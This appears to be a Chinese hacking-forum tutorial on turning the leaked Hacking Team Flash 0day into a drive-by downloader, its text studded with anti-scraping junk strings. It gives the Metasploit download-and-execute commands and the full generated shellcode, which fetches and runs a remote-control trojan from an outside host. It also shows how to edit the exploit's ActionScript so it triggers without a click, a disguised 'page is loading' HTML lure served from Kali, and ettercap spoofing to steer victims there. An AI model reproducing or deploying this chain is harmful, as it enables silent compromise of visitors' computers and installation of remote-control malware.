找回密码
 立即注册
查看: 2022|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

Y( Q$ P! ~9 a6 p& ~ 三、flash 0day之手工代码修改制作下载者实例入侵演示 4 i" u3 V: g, R6 O: d

# W6 _9 r' j$ j

8 i: ?+ {# ^1 C6 @! K9 p9 T4 a 利用到的工具: : ]5 ~: G0 C: S& w) n! c

3 A @, Q( P2 a8 R- k- Z/ x/ h$ c+ w/ w

4 A* M% @5 G- F3 T Msf 8 O8 U! l1 [) }) P' s

5 T& _( S- e7 ?% L, x# f% _

; O/ a4 W# E1 A% O G Ettercap + i. l* i* T' v1 r: N

, M; U) P A5 }9 b3 \

$ N" w. H8 o1 E% T Adobe Flash CS6 7 s; O" o$ b9 Q- [' \( D

4 Z( p$ v& S" u

$ c2 B( C" `0 T2 [- ^& u5 Z( y; y; W Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 w3 z/ M8 j/ B* i2 q

, D* f+ E8 i6 Q; G; F

5 q; n% V5 b, [ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options & S/ i0 ]# P r2 f% T; v9 Q

- K6 f) w9 ]0 L0 j! W

9 p' k( _5 U, `3 t& m 如图: 7 [: n2 j; X4 G" P

' \6 Q* _0 S0 p' D7 Y

6 I2 W) Z& P% s   6 i' A/ w% V2 v9 C

1 F4 \ ]+ Q8 ~& \1 u! c3 k

5 R1 {% Z0 f: ?" E9 J   * o/ z9 T2 ^4 i0 i8 M) B

" P% M' v8 m" G8 i

7 x7 g0 i( T. k H 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % F3 U( V: Y+ e0 Z

' u8 S: [% g, i; F8 ~( V

5 `; ?/ y. h0 S0 ~" o0 f/ p; w   / a4 m/ }% S& K4 A

0 x1 M5 P4 e- R' x6 G

/ s: ^3 X6 Z, N) n/ X   : d9 @8 ~, i1 ~" q# k# b6 j

1 ]8 P' d5 e& ^, E/ L( E

# T4 p% {% |7 v! r9 o 然后执行generate -t dword生成shellcode,如下: ( K" v5 S, r- J. F z* ^

* {: S. x; v) r: b) z; @

4 |1 b5 l' R. I. J. D, A/ T+ [   1 \( C0 r5 q$ j( `9 G9 Y! ], L

2 U3 K( b7 z' ~* c

. a4 u$ ^- o7 e2 q$ h 复制代码到文本下便于我们一会编辑flash exp,如下: 3 Q7 r8 A# e' q5 h6 V7 T

& ~5 Y! F# T1 @7 j2 _5 [8 d

/ z& f7 s7 Y* ~8 z 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, # w8 i" j3 l6 F2 K+ J. u+ y

. ?; Y, X' J# S; V8 E

! t5 d+ r' M8 t) Q' \ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ M9 u6 M) s9 {9 u4 V1 K

1 |' r; B! j$ p7 W/ [

6 d% i, y, j$ b- { 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + b* B) ~% ]4 d! _: D) Y4 K# n( x

% [( F7 y0 `1 j5 W$ l

" }8 X6 t# y/ s5 N4 Y, l6 h 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, . w; |; o0 n" e8 O F

0 t, ?" w- ?8 o& V6 h8 ?" ~* Z

1 d; V( H# A7 T" Y ~/ g0 n9 X 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! a; u$ b2 K( L% V1 S/ I

! Z# A( D4 I, H/ K0 e

/ I- u/ G8 N5 Y' C! r/ J 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 9 O( \, a1 a) {# e$ L! e

# {0 \9 ?/ z, Y& f

. o0 Z' l& }2 ^! e1 _ 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 8 ?6 v; t; d: j5 ^

4 `6 f$ }* _! h9 Z6 X. D# g7 @; X

( ~& k' [: C+ J# ] 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 Y% Y" ?0 a' a- d

0 h1 t5 ?( r: x0 X( s4 N6 T5 K

9 i: u% ^* ~) N& l! U8 H. A 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 m5 X& r8 ]; W, v# z- t3 z, t

- I j) N% T! \

! Y4 ^( X3 J( A) W 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, $ R* W3 G- j* Z$ `" e/ s6 w# p

" F- Q+ T) Q0 Z. K

7 ^6 Y- h- H% T; E+ k/ u; | 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : G9 L; [/ S* O1 B2 B

& A0 f" [6 ?* U7 x: e/ M

+ I" k; y9 N: |$ z) @* V& X 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 n( x; S2 ]$ U" M; a( y( A

" {& f1 J- Q5 Q4 M+ V) Z

1 {5 d" d: e$ ]6 p2 Y 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - u- U/ v7 G; e5 b

) f, F( Z9 o8 P$ F' s5 X0 z9 s

9 b1 ?+ x: |8 \7 q. t }2 f& g, X* ` 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 1 g& R$ c# Z( ^) y4 [1 H

$ `$ M# w2 _8 I, I' @2 d

+ v& |0 B- J" S. Y   ; b2 t7 h( e$ T2 ~. e( T! ^

# ^# d8 L1 M* o0 X6 |

- J" U" u. C& q   4 ^+ a* |! H" C6 z1 F7 U

! B5 T/ _& v2 H1 l/ D

2 H/ ~8 ~' t7 e; c7 K9 ? 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ) y3 `% ]: h1 `& r3 _

; J# P, e- L# T3 x

2 H+ O8 w& O2 B/ F1 L* f   9 O1 v& R$ y3 j; ?7 ], x* u! ]9 @

5 l' a3 j+ X5 f9 x. C

8 I3 O5 h. I8 c1 H! w. }) L 先修改ShellWin32.as,部分源代码如图: , m. F3 s4 A& f* z- y e0 G6 K: B

; P6 [: r- f8 a8 Z- R

, b1 K& n- H, E, v% t$ ?   6 T5 C* ~# K% U! d* D( u

: F) Y R$ O: o" p) a

4 x9 p9 b5 C- G6 i* @( a& s/ J5 w 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 ]( A. M! x# {, p

4 ?1 i8 {: {& }9 o5 k

" x Z7 z, e6 e. a% F5 v   $ k6 J9 E8 Q( p( Y2 d* m( s. @

1 h( o7 g6 ^3 Z7 ]

/ I9 `5 Q) H# b6 H 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ( G! @8 f) T/ f% Y/ E, Y6 ?" C

: N& A% q2 P9 e0 W

6 m. K8 U2 I1 C   1 h, Z; v0 T+ E3 p- H) ~: Z

4 C/ d) K# ~6 E0 t% H/ {7 B

9 R3 C9 g0 t$ {, {6 t2 o 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 m3 I& z# N0 H8 f, @

6 v+ K8 R0 G( h$ z0 j. F

; k5 d3 a4 q# t7 R5 x   . F7 q z3 s" w* r/ J; n

9 _) P4 \) X7 p' ^* ]3 _; B

V/ M+ }3 m9 W5 n- S   ( K* j& a: r3 V/ E

1 J( M0 x4 d( `) E* |; R6 D

: x& M4 O% b5 E( j) H" F   7 ^) E7 \5 O# Q

' D* S7 x7 G& ^/ E

, Y: _# H, ?5 U5 S 然后点保存,下面我们来编译一下,打开 $ d9 w/ m) e3 \1 I; K% s

/ H1 ` B0 W* r/ ~7 U# t

# I. n: Q8 C# G2 z exp1.fla然后点文件-发布,看看编译没错误 ~/ Y. G/ l4 ^' \/ e- _0 O6 P

; }' y; h l7 f% i. r

/ S0 y8 V" o1 G% ], _2 v0 ?   + t* z* @/ ]+ j2 A

6 j& T& d) [& z( \1 O1 A; F

/ p) s' J# s+ `+ m; j3 k# h7 b   , H) ? u8 e B J' @4 A1 d

4 s1 b; l, j$ @# o1 ^$ E/ [

- w: L; F3 K' U' Z   # P7 x$ W$ c/ R0 b9 n6 V- U

7 ]- r! F; v/ p% f3 v8 c

0 I" X9 X5 g2 t# B0 z' X   % D5 b5 k* L& ]7 d- ], U8 T# _5 M

7 I& {4 Z' `) l( U8 ?+ t

" ?% k4 [5 e9 d3 G# Q. g9 h 然后我们把生成的 6 M( Z# |& n8 u9 s: i: r

3 {2 e) c3 t& ~* M3 r9 J* z

& u7 G; s' Q# h0 ~2 v+ \ exp1.swf丢到kailinux /var/www/html下: 8 w# J8 s- d& c" `: ]+ u& S

2 F" P7 z- L# c' j

+ M6 I! r0 c! a$ z! c 然后把这段代码好好编辑一下 & L! }" K$ ^8 g* x: J4 r+ s

! Q7 ^8 M7 b3 I7 e

y/ D1 A9 \! F   ( X9 b6 e. X p0 m

% n `* a8 g$ T/ m

. M u% R( n6 e$ ^. I0 z# K- X# C   ) n) X# `- v( D* W6 P/ B

8 W8 T% \6 d: P5 O% M+ j

7 H# k( g4 y; D9 c   1 d$ o, k' t: c5 ~: P' c) E% V

6 h6 o3 w. J# U7 e. \

* |$ O4 V) f3 \5 d1 N% x   / V" g! k; d5 t. O5 ^' z

) A: w/ a3 C9 K1 Y E! N1 K

6 W3 ?7 r% b- I1 X- T5 V   7 P: b( f! {& R& ]

6 J6 E& p2 [/ Q5 H4 z: y

+ @$ [* o% E7 e   5 G- Z2 a7 g& [4 k% M7 ~

F9 }8 m; N9 J

) d. Y2 T# w8 ?. w$ N/ L% K <!DOCTYPE html> : L/ k6 y1 I8 h& G& D$ \

# r i2 ~# Q% ^" Y

- m( T0 s9 R* y6 x( d" T- i0 K- h <html> 5 V& v* q: v3 {' ^) W& T

* a- d: r5 w) Z6 v* ^! ^( r

N1 J( Y9 q" q <head> ( E: s0 E% J- A1 ]

, l3 X# b3 F. R& a6 |$ R% u* {

2 J4 m* f/ \7 @, x. Z- u- e) q <meta http-equiv="Content-Type" content="text/html; + H; v: O' i3 y+ K7 D: D

5 H# a6 V3 K, H

; F' `+ ]9 h$ `+ M B9 Z# n charset=utf-8"/> 3 h4 y8 F( | W) ^. K

' g {& t! ?9 `" d0 Z# _0 s

3 K( U9 u6 b& V& g5 w7 w) f6 B </head> / e: v, u6 o3 v( Q: @$ X

( z+ v- v" [5 [4 D& w/ a

6 p( Z1 ?! u5 i, e. y: I <body> ! e- W) o% G) A {; L- {7 n

& w2 e% f# m+ U3 T- }0 f

) C1 K0 q* ?4 ~! x <h2> Please wait, the requested page is loading...</h2> . L6 Q7 T$ P3 P2 V# K. v

/ Y' L- A1 e/ G; x6 B/ k, P6 b

5 I# e3 ^8 i- z5 J <br> 0 A! z/ g) v& q" e

# ?* y" _5 C0 l& B o3 a- M

( ?0 {0 c, J1 w; d6 d% O+ l8 D$ p% K <OBJECT 1 J2 d8 @0 Q K9 H2 ^2 i

+ y2 r8 P: a1 `- V+ L

, t( F7 Y8 ^$ H1 P% x1 S classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 7 a1 m- L( U( [5 _

5 {, U# F3 e! E: P. r6 `: Y

1 k/ B1 m# M" P3 Q" w) Z& H VALUE="http://192.168.0.109/exp1.swf"></OBJECT> v- X- @" ` H( W

* |7 T8 E. b' I- ?# l% e

5 K) l9 {# [6 T2 l* t8 F: h </body> ' \5 f+ m" o# @. R" {

$ g* [. b$ v& s+ w: O% i

) Z. D& k, M. t, K1 T0 w <script> $ A, o* h' ^1 J1 ]- U7 A

1 G0 C. w* }' x8 ?- ?, d& N; {

8 p" z, y& h% A     setTimeout(function () { . I8 I( Y$ ~/ Q" o2 f

' o! f, c h, Z

- ]) Y( G9 C+ D: \* T6 [) t6 v4 y; F          3 j+ m1 @' p9 Q9 }( S' w

3 f/ U# L# e* q8 [4 ?2 P2 L

4 w2 ^+ d; Z! e4 o window.location.reload(); - c. V; A- y, w$ B* d

2 Q% A& |, b( o8 c9 ?: y8 L

( }7 _' h$ k0 {& d     }, 10000); 0 \ D5 V9 I- n9 C) Q9 \) o

6 Y1 u; L' K; W. |) `

$ \8 Q }6 Z2 W( m3 g o: V0 m   6 c8 q3 t- |/ k. @, D

& Q- A( Y$ ?/ g# F! k

6 |, ]( I3 s/ f+ [. _' G </script> : i- w2 R7 F5 H4 f

8 A! e) M" v; A7 Y( Z/ Z+ ^

! [# I" m9 n8 X8 g </html> # M/ L) D5 T: Q" r

. g& ]5 V. f5 o7 Q

& C* z- q' q2 k' h' E3 f$ @   $ v0 F2 w+ t, @* X& X

+ ]: h. ?" c# b. |/ [

6 K) D/ e! l1 V* i0 K7 w 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 4 ?1 ~/ D3 a% o, Y s" j8 X

! ~ Y V/ Z5 t" Q, d( u+ r2 _* t

" J+ ]8 G( e& M* S, t0 }& ?   - Q' B6 _0 G4 |. h

. J. G# W0 k+ X/ P% J

+ d& m+ ?. y, g- _- p2 H   5 J8 n/ J" [8 {

9 ]9 Y; b- g) r. Y9 N) z+ A& j

: c/ n+ G' O6 N5 n% v6 v   3 I, X1 q+ s" g" ]3 @

$ u& I! L/ c, P8 j

% t/ D5 t) w9 F, Y   5 V0 q6 v: y2 o

! ], c% X B* v# U# {3 |2 [8 F

2 w( e/ f8 s. f6 {; T2 t   4 @. {5 P- ?4 r, Z6 N

0 u' Z8 G5 X8 k" I3 q% J$ `7 F

# A- i5 d1 h3 e# \* c# @ 下面我们用ettercap欺骗如图: $ P, L' g5 @' t. K# {+ _, o

3 G( e- Z' t- p$ L' [( r" w; D

# y7 y5 T+ F- ?0 N   9 k" V! m) p1 i$ q7 T

: A4 g/ R8 \. F6 x9 U

* ]2 Z: P% N0 P/ z/ D% s& n% b" a( \   ' k$ q) b. b. R9 z6 V4 v3 ~

' B- f# l2 W6 A m e0 n

7 K9 h3 [* P/ u, W 下面我们随便访问个网站看看: 9 _7 a8 I, \. x, s" V% Z; C

5 B( U; e; r6 j; R! a; B: A

4 b" n. E9 W) M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: " i/ I0 [3 q: ^6 v6 Q

9 n4 v+ n4 B ?! p* I. A

- F4 @, m) e0 d1 t& f: b: c' \   * z! |- j' L! L) K) ]- n5 Z6 t) [

1 |2 q8 L0 V7 G0 y2 C" @3 g. t; T

1 ~: t3 ~) J- w L3 a; }& r; q 我们看另一台, 6 L) w# V: m' x0 c8 E

; [: j; c- q$ O- z" `) t

$ L* O$ k# e J. A, L3 i0 {; s3 j 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 5 c ?0 W) K3 k' H/ a9 b- ?, m

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表